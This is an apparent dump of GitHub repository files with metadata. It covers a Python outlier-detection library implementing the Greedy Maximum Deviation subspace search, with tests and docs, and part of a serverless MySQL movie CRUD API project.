"text": "import pytest\nimport numpy as np\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.utils.testing import assert_dict_equal\n\nfrom .context import *\n\n\[email protected]\ndef data():\n return load_iris(return_X_y=True)\n\n\ndef test_gmd_estimator(data):\n est = GMD(runs=1000, random_state=1234)\n assert est.alpha == 0.1\n assert est.runs == 1000\n\n est.fit(*data)\n assert hasattr(est, \"is_fitted_\")\n\n assert_dict_equal(\n est.subspaces_, {0: [0, 2, 3], 1: [1, 3, 2], 2: [2, 3], 3: [3, 2]}\n )\n"
},
{
"alpha_fraction": 0.5801630616188049,
"alphanum_fraction": 0.5930706262588501,
"avg_line_length": 35.18852615356445,
"blob_id": "a6146cbb406680bacb979d1ea83340a9c19970be",
"content_id": "88030d6287eb408711b62b8af78bf63cc9f0696a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4416,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 122,
"path": "/gmd/incremental.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "from collections import deque\nimport numpy as np\nfrom libgmdc import subspace_slice, set_seed, kstest, subspace_slice_oldest\nfrom .incsortedindex import IncSortedIndex\n\n\nclass IncSubspaceContrast:\n def __init__(self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234):\n self.subspace = subspace\n self.ref_dim = np.int32(ref_dim)\n self.alpha = alpha\n\n self.sorted_index = IncSortedIndex(data)\n\n self.seed = seed\n set_seed(seed)\n\n self.iterations = iterations\n self.init_result()\n\n def insert_and_shift(self, new_point):\n self.sorted_index.del_and_ins_sorted(new_point)\n return self.shift(new_point)\n\n def shift(self, new_point):\n pass\n\n def init_result(self):\n self.res = np.zeros((self.iterations, 1))\n for i in range(self.iterations):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n\n\nclass EvictedSubspaceContrast(IncSubspaceContrast):\n def __init__(self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234):\n super().__init__(data, subspace, ref_dim, iterations, alpha, seed)\n self.len_evicted = []\n self.variances = []\n\n def init_result(self):\n self.res = np.zeros((self.iterations, 2))\n for i in range(self.iterations):\n curr_slice, oldest = subspace_slice_oldest(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i, 1] = oldest\n self.res[i, 0] = kstest(\n curr_slice, self.sorted_index.sorted[:, self.ref_dim]\n )\n\n def shift(self, new_point):\n self.res[:, 1] -= 1\n evicted = np.where(self.res[:, 1] == -1)[0]\n self.len_evicted.append(len(evicted))\n self.variances.append(self.res[evicted, 0])\n for i in evicted:\n curr_slice, oldest = subspace_slice_oldest(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i, 1] = oldest\n self.res[i, 0] = kstest(\n curr_slice, self.sorted_index.sorted[:, self.ref_dim]\n )\n return np.mean(self.res[:, 0])\n\n\nclass ReplaceOldestSubspaceContrast(IncSubspaceContrast):\n def __init__(\n self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234, k=10\n ):\n super().__init__(data, subspace, ref_dim, iterations, alpha, seed)\n self.k = k\n\n def shift(self, new_point):\n for i in range(self.k):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res.append(\n kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n )\n return np.mean(self.res)\n\n def init_result(self):\n res = np.zeros((self.iterations, 1))\n for i in range(self.iterations):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n self.res = deque(res, self.iterations)\n\n\nclass OriginalGMDSubspaceContrast(IncSubspaceContrast):\n def shift(self, new_point):\n for i in range(self.iterations):\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n return np.mean(self.res)\n\n\nclass ReplaceRandomSubspaceContrast(IncSubspaceContrast):\n def __init__(\n self, data, subspace, ref_dim, iterations=100, alpha=0.1, seed=1234, draws=50\n ):\n super().__init__(data, subspace, ref_dim, iterations, alpha, seed)\n self.draws = draws\n\n def shift(self, new_point):\n to_replace = np.random.randint(0, self.iterations, self.draws)\n 
for i in to_replace:\n curr_slice = subspace_slice(\n self.sorted_index.sorted, self.subspace, self.ref_dim, self.alpha\n )\n self.res[i] = kstest(curr_slice, self.sorted_index.sorted[:, self.ref_dim])\n\n return np.mean(self.res)\n\n"
},
{
"alpha_fraction": 0.5974165797233582,
"alphanum_fraction": 0.6135629415512085,
"avg_line_length": 24.80555534362793,
"blob_id": "366abda4d6e287bc1ae6e03c5d77fbfa8b53a6fd",
"content_id": "f7b6f4098faf92d11fa16041e585d31b60fb7b67",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 929,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 36,
"path": "/docs/user_guide.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": ".. title:: User guide\n\n.. _user_guide:\n\n==============\nUsage Examples\n==============\n\nUse subspaces as LoF input\n--------------------------\n\n::\n\n import numpy as np\n import pandas as pd\n from sklearn.preprocessing import LabelEncoder\n import sklearn.metrics as metrics\n from sklearn.datasets import kddcup99\n from sklearn.neighbors import LocalOutlierFactor\n from gmd import GMD\n\n kdd = kddcup99.fetch_kddcup99(subset='SA')\n df = pd.DataFrame(kdd.data)\n df[[1,2,3]] = df[[1,2,3]].apply(LabelEncoder().fit_transform)\n df = df.apply(lambda x : pd.to_numeric(x))\n y_true = kdd.target != b'normal.'\n\n gmd = GMD()\n gmd.fit(df)\n\n subspaces = gmd.subspaces_\n preds = np.zeros((df.shape[0],len(subspaces)))\n for k, v in subspaces.items():\n clf.fit(df.iloc[:,subspaces[k]])\n preds[:,k] = clf.negative_outlier_factor_\n metrics.roc_auc_score(y_true, preds.sum(axis=1)*-1)\n"
},
{
"alpha_fraction": 0.7077702879905701,
"alphanum_fraction": 0.7353603839874268,
"avg_line_length": 42.29268264770508,
"blob_id": "0f7af8f5c00ddf9bb97b9d0a7cd07a41c1f526b0",
"content_id": "e651e7b0e6efb5bede8802b2c3f01beaa9a802dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1776,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 41,
"path": "/README.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": ".. -*- mode: rst -*-\n\n|Travis|_ |AppVeyor|_ |Codecov|_ |CircleCI|_ |ReadTheDocs|_\n\n.. |Travis| image:: https://travis-ci.com/FlopsKa/gmd.svg?branch=master\n.. _Travis: https://travis-ci.com/FlopsKa/gmd\n\n.. |AppVeyor| image:: https://ci.appveyor.com/api/projects/status/84j8gekk5ob3i28d/branch/master?svg=true\n.. _AppVeyor: https://ci.appveyor.com/project/FlopsKa/gmd/\n\n.. |Codecov| image:: https://codecov.io/gh/FlopsKa/gmd/branch/master/graph/badge.svg\n.. _Codecov: https://codecov.io/gh/FlopsKa/gmd\n\n.. |CircleCI| image:: https://circleci.com/gh/FlopsKa/gmd.svg?style=shield&circle-token=:circle-token\n.. _CircleCI: https://circleci.com/gh/FlopsKa/gmd/tree/master\n\n.. |ReadTheDocs| image:: https://readthedocs.org/projects/gmd/badge/?version=latest\n.. _ReadTheDocs: https://gmd.readthedocs.io/en/latest/?badge=latest\n\nScikit-learn Greedy Maximum Deviation (GMD) Algorithm\n=====================================================\n\n.. _scikit-learn: https://scikit-learn.org\n\nThis project provides a `scikit-learn`_ compatible python implementation of the\nalgorithm presented in [`Trittenbach2018`_] together with some usage examples\nand a reproduction of the results from the paper.\n\nRecent approaches in outlier detection seperate the subspace search from the\nactual outlier detection and run the outlier detection algorithm on a\nprojection of the original feature space. See [`Keller2012`_]. As a result the\ndetection algorithm (Local Outlier Factor is used in the paper) does not suffer\nfrom the curse of dimensionality.\n\n\n.. _Trittenbach2018: https://link.springer.com/article/10.1007/s41060-018-0137-7\n.. _Keller2012: https://ieeexplore.ieee.org/document/6228154\n\n.. _documentation: https://gmd.readthedocs.io/en/latest/\n\nRefer to the documentation_ to see usage examples.\n\n"
},
{
"alpha_fraction": 0.4465571939945221,
"alphanum_fraction": 0.49049264192581177,
"avg_line_length": 30.2702693939209,
"blob_id": "c1ff6c18228cc15bcfe21564a43db41d089c3e7d",
"content_id": "f3cf94369e812b1a7d5a643fabbed36ccc265361",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6942,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 222,
"path": "/tests/test_compare_with_r.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import os\nimport unittest\nimport pandas as pd\nimport numpy as np\nimport numpy.testing as npt\n\nfrom .context import *\nfrom .context import libgmdc\n\n\nclass TestGMD(unittest.TestCase):\n \"\"\"\n Test the GMD implementation. The implementation is based on the original\n implementation from the paper: https://github.com/holtri/R-subcon\n \"\"\"\n\n def test_create_sorted(self):\n unsorted = np.array([[0, 3, 2], [1, 0, 3], [3, 2, 0]])\n greedy = GMD(random_state=1234)\n greedy.fit(unsorted)\n self.assertEqual(greedy._sorted.tolist(), [[0, 1, 2], [1, 2, 0], [2, 0, 1]])\n\n def test_kstest_with_ties(self):\n \"\"\"\n Compare the output of the cython kstest implementation to the output of\n the original implementation.\n \"\"\"\n view = np.array(\n [\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n True,\n False,\n True,\n False,\n ],\n dtype=np.uint8,\n )\n data = np.array(\n [\n 0.00,\n 0.21,\n 0.06,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n 0.15,\n 0.06,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n 0.00,\n ]\n )\n sorted_index = np.argsort(data, kind=\"mergesort\")\n distance = libgmdc.kstest(view, sorted_index.astype(np.int32))\n self.assertAlmostEqual(distance, 0.466666666666667)\n\n def test_kstest_without_ties(self):\n \"\"\"\n Compare the output of the cython kstest implementation to the output of\n the original implementation.\n \"\"\"\n view = np.array(\n [\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n True,\n False,\n True,\n False,\n ],\n dtype=np.uint8,\n )\n data = np.array(\n [\n 0.01,\n 0.21,\n 0.06,\n 0.02,\n 0.03,\n 0.04,\n 0.05,\n 0.07,\n 0.15,\n 0.08,\n 0.09,\n 0.10,\n 0.11,\n 0.12,\n 0.13,\n ]\n )\n sorted_index = np.argsort(data, kind=\"mergesort\")\n distance = libgmdc.kstest(view, sorted_index.astype(np.int32))\n self.assertAlmostEqual(distance, 0.6)\n\n def test_compare_kstest_with_r(self):\n dist = np.array([1, 1, 4, 1, 9])\n selection = np.array([False, True, False, False, False], dtype=np.uint8)\n sort = np.argsort(dist)\n self.assertEqual(libgmdc.kstest(selection, sort.astype(np.int32)), 0.6)\n\n def test_compare_kstest_with_r_two_selected(self):\n dist = np.array([1, 1, 4, 1, 9])\n selection = np.array([False, True, True, False, False], dtype=np.uint8)\n sort = np.argsort(dist)\n self.assertEqual(libgmdc.kstest(selection, sort.astype(np.int32)), 0.2)\n\n def test_compare_kstest_with_r_all_selected(self):\n dist = np.array([1, 1, 4, 1, 9])\n selection = np.array([True, True, True, True, True], dtype=np.uint8)\n sort = np.argsort(dist)\n self.assertAlmostEqual(libgmdc.kstest(selection, sort.astype(np.int32)), 0.0)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_compare_kstest_with_slice_from_r(self):\n r_slice = pd.read_csv(\"tests/res/slice_from_r_0.71789.csv\", header=None).values\n r_slice = r_slice[:, 0].astype(np.uint8)\n\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n greedy = GMD(random_state=1234).fit(data)\n\n self.assertAlmostEqual(libgmdc.kstest(r_slice, greedy._sorted[:, 0]), 0.7178874)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_sorted_is_the_same_as_in_r(self):\n compare = np.array(\n [\n [0, 3, 3, 3, 10],\n [3, 4, 4, 4, 17],\n [4, 5, 5, 5, 20],\n [5, 6, 6, 6, 24],\n [6, 7, 7, 7, 26],\n [7, 10, 10, 
10, 27],\n [10, 11, 13, 13, 28],\n [11, 13, 16, 16, 33],\n [12, 14, 17, 17, 55],\n [13, 16, 20, 20, 56],\n ]\n )\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n greedy = GMD(random_state=1234).fit(data)\n npt.assert_array_equal(greedy._sorted[0:10], compare)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_avg_deviation_statistics(self):\n \"\"\"\n Compares the output from the R deviation computation to the output of\n the new implementation by using the data in res/dt_uniform.csv.\n\n The csv is created using R and the following commands:\n\n library(data.table)\n library(subcon)\n dt <- fread('tests/res/spambase_small.data')\n indexMatrix <- sortedIndexMatrix(dt)\n out <- deviationStatisticsC(indexMap = indexMatrix, alpha=0.1, numRuns=10000)['avg']\n write.csv(out, file='tests/res/deviations_compare_with_R.csv')\n \"\"\"\n comp = pd.read_csv(\n \"tests/res/deviations_compare_with_R.csv\", index_col=0\n ).values\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n greedy = GMD(runs=1000, random_state=1234).fit(data)\n res = greedy._deviation_matrix()\n\n npt.assert_almost_equal(comp, res, decimal=2)\n\n @unittest.skipIf(\n \"TRAVIS\" in os.environ and os.environ[\"TRAVIS\"] == \"true\",\n \"Skipping this test on Travis CI.\",\n )\n def test_gmd_1(self):\n data = pd.read_csv(\n \"tests/res/spambase_small.data\", index_col=None, header=None\n ).values\n\n greedy = GMD(alpha=0.1, runs=1000, random_state=1234)\n greedy.fit(data)\n subspaces, _ = greedy._max_deviation_subspaces(4)\n self.assertEqual(subspaces, [4, 3, 2]) # computed with R impl\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.7792207598686218,
"alphanum_fraction": 0.7792207598686218,
"avg_line_length": 24.66666603088379,
"blob_id": "eae7dc7a0c80353f0861f664ca6b932f356c85d9",
"content_id": "c569a55c4b45cdf13066bebf28a8d91d014656d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 3,
"path": "/gmd/__init__.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "from gmd.gmd import *\nfrom gmd.incsortedindex import *\nfrom libgmdc import *\n"
},
{
"alpha_fraction": 0.6052631735801697,
"alphanum_fraction": 0.6435406804084778,
"avg_line_length": 26.866666793823242,
"blob_id": "74762b90571d0af67eea47334f1b0c5d7ced890a",
"content_id": "73fcac3c103740eafc928283fa82f9dee5b3b9ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 15,
"path": "/gmd/evaluation.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef jaccard_coeff(s1: set, s2: set) -> float:\n return len(s1.intersection(s2)) / len(s1.union(s2))\n\n\ndef similarity_matrix(df1, df2):\n assert df1.shape == df2.shape\n assert df1.columns.tolist() == df2.columns.tolist()\n\n matrix = np.zeros(df1.shape)\n for i, col in enumerate(df1.columns):\n matrix[:, i] = [jaccard_coeff(*s) for s in zip(df1[col], df2[col])]\n return matrix\n"
},
{
"alpha_fraction": 0.5581395626068115,
"alphanum_fraction": 0.5581395626068115,
"avg_line_length": 14.527777671813965,
"blob_id": "b1b07865437b28259309ed02167b55348819327e",
"content_id": "ff55d3d14adf59af35c652fe8f77f1e35030afbb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 559,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 36,
"path": "/docs/quick_start.rst",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "###########################\nInstallation of the package\n###########################\n\nThe package can be installed via `pip` or directly from the\nrepository.\n\nInstall using pip\n-----------------\n\n::\n\n $ pip install gmd\n\n\nInstall from the repository\n===========================\n\n::\n\n $ git clone https://github.com/flopska/gmd\n $ cd gmd\n $ pip install .\n\n\nUsage\n#####\n\nAfter the installation the library can be used like every scikit-learn\ncompatible estimator::\n\n from gmd import GMD\n\n gmd = GMD()\n gmd.fit(data)\n print(gmd.subspaces_)\n"
},
{
"alpha_fraction": 0.4654534161090851,
"alphanum_fraction": 0.5256015062332153,
"avg_line_length": 32.77083206176758,
"blob_id": "5b675b2397a9aa3ba0bd8e5503909e7e4b5100f8",
"content_id": "825c90d167ca0e521891b8b2597804db2b231e57",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3242,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 96,
"path": "/tests/test_incr_gmd.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "import unittest\nimport numpy as np\nimport pandas as pd\n\nfrom .context import *\nfrom .context import libgmdc\n\n\nclass TestIncGMD(unittest.TestCase):\n \"\"\"\n Test the incremental GMD implementation\n \"\"\"\n\n def gen_data(self, length):\n return pd.DataFrame(\n {\n \"x1\": np.random.uniform(0, 1, length),\n \"x2\": np.random.uniform(0, 1, length),\n \"x3\": np.random.uniform(0, 1, length),\n \"x4\": np.random.uniform(0, 1, length),\n \"x5\": np.random.uniform(0, 1, length),\n \"x6\": np.random.uniform(0, 1, length),\n \"x7\": np.random.uniform(0, 1, length),\n \"x8\": np.random.uniform(0, 1, length),\n \"x9\": np.random.uniform(0, 1, length),\n \"x10\": np.random.uniform(0, 1, length),\n }\n )\n\n def setUp(self):\n unsorted = np.array([[0.1, 1.4, 2.7], [1.2, 1.5, 0.8], [2.3, 3.6, 1.9]])\n\n self.sorted_index = IncSortedIndex(unsorted)\n\n def test_can_create_sorted(self):\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[0, 0, 1], [1, 1, 2], [2, 2, 0]]\n )\n\n def test_delete_two_oldest(self):\n e1 = np.array([4.8, 0.2, 1.2])\n e2 = np.array([1.5, 2.4, 0.3])\n self.sorted_index.del_and_ins_sorted(e1)\n self.sorted_index.del_and_ins_sorted(e2)\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[2, 1, 2], [0, 2, 1], [1, 0, 0]]\n )\n\n def test_delete_and_insert(self):\n e1 = np.array([4.8, 0.2, 1.2])\n self.sorted_index.del_and_ins_sorted(e1)\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[0, 2, 0], [1, 0, 2], [2, 1, 1]]\n )\n\n def test_delete_and_insert_multiple_times(self):\n e1 = np.array([4.8, 0.2, 1.2])\n e2 = np.array([1.5, 2.4, 0.3])\n self.sorted_index.del_and_ins_sorted(e1)\n self.sorted_index.del_and_ins_sorted(e2)\n self.assertListEqual(\n self.sorted_index.sorted.tolist(), [[2, 1, 2], [0, 2, 1], [1, 0, 0]]\n )\n\n def test_inc_insert_is_equal_to_regular_sorting(self):\n df = self.gen_data(1000)\n window_size = 50\n start_window = df[:window_size]\n\n sorted_index = IncSortedIndex(start_window)\n for i in range(window_size, len(df)):\n sorted_index.del_and_ins_sorted(df.iloc[i])\n\n # the sorted_index should now equal the data structure we obtain by just\n # sorting the last 100 elements\n\n reference = GMD().create_sorted_index(df[-window_size:])\n self.assertListEqual(sorted_index.sorted.tolist(), reference.tolist())\n\n def test_initial_sorting_works_with_ties(self):\n data = np.array(\n [\n [0.0, 0.64, 0.64, 0.0, 0.32],\n [0.21, 0.28, 0.5, 0.0, 0.14],\n [0.06, 0.0, 0.71, 0.0, 1.23],\n [0.0, 0.0, 0.0, 0.0, 0.63],\n [0.0, 0.0, 0.0, 0.0, 0.63],\n ]\n )\n expected = GMD().create_sorted_index(data)\n actual = IncSortedIndex(data).sorted\n self.assertListEqual(actual.tolist(), expected.tolist())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
}
] | 17 |
delta575/yapp-backend-dev
|
https://github.com/delta575/yapp-backend-dev
|
906e5f24df806409540a4b4b091e02c051cd25ef
|
d5450c9a1c2f882c489682d3ce38f945b0460b26
|
ed4143f78e07a76e84545cb032e77f93a2a52913
|
refs/heads/master
| 2022-11-10T06:00:20.304553 | 2020-06-24T07:29:45 | 2020-06-24T07:29:45 | 274,256,708 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.523379385471344,
"alphanum_fraction": 0.5515409111976624,
"avg_line_length": 27.953845977783203,
"blob_id": "277b686053a12b45b33c8473f5559c3e64a146bb",
"content_id": "9e1cff628fa9e7aafe45b764ab9e28491aecd44e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1882,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 65,
"path": "/yapp_backend/models.py",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, Integer, String\nfrom sqlalchemy_serializer import SerializerMixin\n\nfrom db import Base\n\n\nclass Movie(Base, SerializerMixin):\n \"\"\"Movie model for mysqlachemy\n Valid JSON data example:\n {\n \"title\": \"Elizabeth\",\n \"genres\": \"Biography,Drama,History\",\n \"age\": \"18+\",\n \"country\": \"United Kingdom\",\n \"directors\": \"Shekhar Kapur\",\n \"disney_plus\": \"0\",\n \"movie_type\": \"0\",\n \"year\": \"1998\",\n \"hulu\": \"0\",\n \"language\": \"English,French\",\n \"rotten_tomatoes\": \"82%\",\n \"imbd\": \"7.4\",\n \"netflix\": \"1\",\n \"prime_video\": \"0\",\n \"runtime\": \"124\"\n }\n \"\"\"\n\n __tablename__ = \"movies\"\n id = Column(\"ID\", Integer, primary_key=True)\n title = Column(\"Title\", String(length=300))\n year = Column(\"Year\", String(length=50))\n age = Column(\"Age\", String(length=10))\n imbd = Column(\"IMDb\", String(length=10))\n rotten_tomatoes = Column(\"Rotten Tomatoes\", String(length=10))\n netflix = Column(\"Netflix\", String(length=10))\n hulu = Column(\"Hulu\", String(length=10))\n prime_video = Column(\"Prime Video\", String(length=10))\n disney_plus = Column(\"Disney+\", String(length=10))\n movie_type = Column(\"Type\", String(length=10))\n directors = Column(\"Directors\", String(length=500))\n genres = Column(\"Genres\", String(length=300))\n country = Column(\"Country\", String(length=300))\n language = Column(\"Language\", String(length=300))\n runtime = Column(\"Runtime\", String(length=10))\n\n _csv_columns = [\n \"index\",\n \"id\",\n \"title\",\n \"year\",\n \"age\",\n \"imbd\",\n \"rotten_tomatoes\",\n \"netflix\",\n \"hulu\",\n \"prime_video\",\n \"disney_plus\",\n \"movie_type\",\n \"directors\",\n \"genres\",\n \"country\",\n \"language\",\n \"runtime\",\n ]\n"
},
{
"alpha_fraction": 0.8131868243217468,
"alphanum_fraction": 0.8571428656578064,
"avg_line_length": 45,
"blob_id": "1efdef764fc2bfb5cd600b00303d4a2933e144c4",
"content_id": "3bc927ae9b4a8da030eab2cadbb3f7104a76ae6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 2,
"path": "/.env.example",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "PYTHONPATH=yapp_backend\nDATABASE_URL=mysql+mysqlconnector://docker:pass@localhost:3306/yapp"
},
{
"alpha_fraction": 0.641566812992096,
"alphanum_fraction": 0.6446092128753662,
"avg_line_length": 44.73043441772461,
"blob_id": "27528ab43f5b451c6727c210bf16e4f98b0ae4bf",
"content_id": "da21c17217703240eb11fad10330b2cd57406281",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5259,
"license_type": "no_license",
"max_line_length": 212,
"num_lines": 115,
"path": "/README.md",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "# yapp-backend-dev\n\n> Yapp Backend Developer code challenge\n\nThis project demonstrates a simple implementation of a Serverless API that implements simple CRUD methods for a MySQL DataBase. It makes use of AWS SAM CLI deploying serverless functions as API endpoint handlers.\n\n## Description\n\nThis project contains source code and supporting files for a serverless application that you can deploy with the SAM CLI. It includes the following files and folders.\n\n- .env.example - A template that defines the project needed environment variables.\n- template.yaml - A template that defines the application's AWS resources.\n- docker-compose.yml - A containerized MySQL DataBase to help with fast deployment.\n- yapp_backend/ - Code for the application's Lambda function.\n - tests/ - Unit tests for the application code.\n - app.py - Serverless API handlers.\n - db.py - Database connection and session setup.\n - models.py - Movie SQLAlchemy model.\n - data.csv - Kaggle data for movies and ratings.\n - seed.py - Script to populate blank DataBase.\n\n## Requirements\n\nThis project assumes the following requirements are met.\n\n- [Python3.7+ ](https://www.python.org/downloads/) - Lambda functions use Python runtime environment.\n- [Docker and docker-compose](https://docs.docker.com/engine/install/) - Needed for AWS SAM CLI and MySQL DataBase.\n- [AWS SAM CLI](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html) - AWS Serverless Application Model framework.\n\n## Deployment\n\n- ### Clone this repo\n\n```bash\n$ git clone https://github.com/delta575/yapp-backend-dev.git # Clone this repo\n$ cd yapp-backend-dev # Change directory to project root folder\n```\n\n- ### Set environment variables\n\nEdit file following this specifications:\n\n```bash\n$ cp .env.example .env # Copy example\n$ nano .env # Edit file\n```\n\n| Variable | Description |\n| ------------ | --------------------------------------------------------------------------------------------------------------------------------- |\n| PYTHONPATH | Changes python root path for SAM compatibility, must be changed to point at \"yapp_backend\" folder |\n| DATABASE_URL | MySQL URL for connection, must follow the following structure: \"mysql+mysqlconnector://{user}:{password}@{host}:{port}/{db_name}\" |\n\n**Important:** Set the same DATABASE_URL environment variable for SAM Global configs located on `template.yaml` file.\n\n- ### Setup virtual environment and install requirements:\n\nInstall development requirements, poetry is used as the preferred package manager.\nFollow the [install instructions](https://python-poetry.org/docs/#installation) for your enviroment.\n\nThen install the project local dependencies:\n\n```bash\n$ poetry install # Create virtual env and install dependencies\n```\n\n- ### Deploy MySQL DataBase\n\nIf you already have MySQL deployed you can skip this step, just make sure to point the DATABASE_URL env var correctly.\n\nFor easy deployment, a MySQL DataBase was containerized with a `docker-compose.yml` which also sets the needed environment variables for authentication.\n\n```bash\n$ docker-compose up --build -d # Deploys MySQL database as a docker container\n```\n\n- ### Seed Data\n\nRun the script `seed.py` which will create the Movie table from it's model and populate the DataBase with `data.csv` content.\ndata.csv follows [this Kaggle repository](https://www.kaggle.com/ruchi798/movies-on-netflix-prime-video-hulu-and-disney/data#) structure.\n\n```bash\n$ 
poetry shell # activate virtual environment\n$ python yapp_backend/seed.py # run seed script\n```\n\n- ### Run Unit Tests\n\nTests are defined in the `tests` folder in this project. Use [pytest](https://docs.pytest.org/en/latest/) to run unit tests.\n\n```bash\npoetry shell # activate virtual environment\npython -m pytest -v # run unit tests\n```\n\n- ### Deploy SAM Local Server\n\n```bash\nsam build --use-container && sam local start-api\n```\n\nYou can test the API visiting a GET method on your browser, by default SAM runs at [http://localhost:3000/](http://localhost:3000/).\n\n[Postman](https://www.postman.com/) is recommended for fully featured testing.\n\n## SAM API:\n\nSimple CRUD methods:\n\n| Method | Endpoint | Description | Requires |\n| ------ | ----------- | ------------------------------------------------------------------ | -------------------------------------- |\n| GET | /movie | Returns Array of Movies | None |\n| GET | /movie/{id} | Returns movie matching id | URL Params: movie id |\n| POST | /movie | Creates new movie from JSON data on body of request | Body: JSON with new movie data |\n| PUT | /movie | Updates movie title by id provided in JSON data on body of request | Body: JSON with movie id and new title |\n| DELETE | /movie | Removes Movie matching id of QueryString from DataBase | QueryString: URL encoded movie id |\n"
},
{
"alpha_fraction": 0.8985507488250732,
"alphanum_fraction": 0.8985507488250732,
"avg_line_length": 16.5,
"blob_id": "35b9fc82a2206fbc28c90766a99dfaf4ca002466",
"content_id": "a34d600308ef65835172a57be735cc3995b59018",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 4,
"path": "/yapp_backend/requirements.txt",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
"text": "python-dotenv\nmysql-connector-python\nsqlalchemy\nsqlalchemy-serializer"
},
{
"alpha_fraction": 0.5871559381484985,
"alphanum_fraction": 0.6660550236701965,
"avg_line_length": 22.69565200805664,
"blob_id": "8e2576a49f2f4c53373e295a1a4ce255b59e4e6f",
"content_id": "d18c19409e21b7bd3563876a6e9ab6b17123c604",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 23,
"path": "/pyproject.toml",
"repo_name": "delta575/yapp-backend-dev",
"src_encoding": "UTF-8",
